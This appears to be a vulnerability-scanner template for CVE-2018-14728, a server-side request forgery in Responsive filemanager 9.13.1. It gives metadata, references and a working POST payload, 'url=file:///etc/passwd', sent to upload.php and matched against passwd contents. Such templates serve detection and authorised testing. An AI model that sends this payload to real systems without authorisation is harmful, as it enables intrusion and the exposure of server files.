id: CVE-2018-14728 info: name: Responsive filemanager 9.13.1 Server-Side Request Forgery author: madrobot severity: critical description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. reference: - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/45103/ - https://nvd.nist.gov/vuln/detail/CVE-2018-14728 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14728 cwe-id: CWE-918 tags: cve,cve2018,ssrf,lfi,packetstorm,edb metadata: max-request: 1 http: - method: POST path: - "{{BaseURL}}/filemanager/upload.php" body: "fldr=&url=file:///etc/passwd" matchers: - type: regex regex: - "root:.*:0:0:" part: body